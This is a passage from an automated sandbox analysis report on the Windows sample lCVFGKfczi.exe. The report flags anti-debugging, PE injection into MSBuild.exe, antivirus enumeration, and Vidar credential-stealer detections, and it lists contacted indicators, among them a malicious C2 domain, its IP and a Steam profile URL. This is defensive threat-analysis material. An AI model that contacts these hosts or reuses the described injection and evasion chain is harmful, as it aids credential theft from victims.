Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h] 3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h] 3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004186AA mov eax, dword ptr fs:[00000030h] 3_2_004186AA
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DDCC4B GetProcessHeap, 0_2_00DDCC4B
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00DC7610
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DC7922
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC7AAF SetUnhandledExceptionFilter, 0_2_00DC7AAF
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DCDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DCDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0041D12A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0041DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042774E SetUnhandledExceptionFilter, 3_2_0042774E

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040F54A _memset,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext, 3_2_0040F54A
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000 Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000 Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000 Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000 Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DB4008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DEE076 cpuid 0_2_00DEE076
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_00DDC085
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: GetLocaleInfoW, 0_2_00DD622B
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free, 0_2_00E123DB
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: EnumSystemLocalesW, 0_2_00DDC372
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: EnumSystemLocalesW, 0_2_00DDC327
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00DDC498
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: EnumSystemLocalesW, 0_2_00DDC40D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_00E1456E
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: GetLocaleInfoW, 0_2_00DDC6EB
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00DDC814
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00DDC9E9
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: GetLocaleInfoW, 0_2_00DDC91A
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free, 0_2_00E16A48
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 0_2_00E17B38
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00E15DBC
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 0_2_00E16D66
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: EnumSystemLocalesW, 0_2_00DD5D7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA, 3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_0042B1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 3_2_0042B2E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 3_2_00429B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 3_2_0042B3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 3_2_0042B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 3_2_0042AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 3_2_00425503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 3_2_0042B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 3_2_004275BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesA, 3_2_0042B676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 3_2_00428EE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 3_2_00429E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 3_2_0042E68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_00427696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_0042B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 3_2_0042B743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_0042B707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA, 3_2_0042E7C4
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00DC7815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA, 3_2_00410C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410D2E GetTimeZoneInformation, 3_2_00410D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000003.00000002.1981603687.0000000001168000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Vidar stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 3.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lCVFGKfczi.exe.dedad8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lCVFGKfczi.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Vidar stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 3.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lCVFGKfczi.exe.dedad8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lCVFGKfczi.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528302 Sample: lCVFGKfczi.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 26 lade.petperfectcare.com 2->26 28 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->28 30 2 other IPs or domains 2->30 34 Suricata IDS alerts for network traffic 2->34 36 Found malware configuration 2->36 38 Antivirus detection for URL or domain 2->38 40 10 other signatures 2->40 8 lCVFGKfczi.exe 1 2->8         started        signatures3 process4 signatures5 42 Writes to foreign memory regions 8->42 44 Allocates memory in foreign processes 8->44 46 Injects a PE file into a foreign processes 8->46 11 MSBuild.exe 151 8->11         started        15 MSBuild.exe 8->15         started        17 WerFault.exe 21 16 8->17         started        20 MSBuild.exe 8->20         started        process6 dnsIp7 32 lade.petperfectcare.com 95.164.90.97, 49743, 80 VAKPoltavaUkraineUA Gibraltar 11->32 48 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->48 22 WerFault.exe 21 16 11->22         started        50 Contains functionality to inject code into remote processes 15->50 24 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->24 dropped file8 signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
95.164.90.97
 lade.petperfectcare.com Gibraltar
39762 VAKPoltavaUkraineUA true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true
lade.petperfectcare.com 95.164.90.97 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://steamcommunity.com/profiles/76561199780418869 true
  • URL Reputation: malware
 unknown
http://lade.petperfectcare.com/ true
    		unknown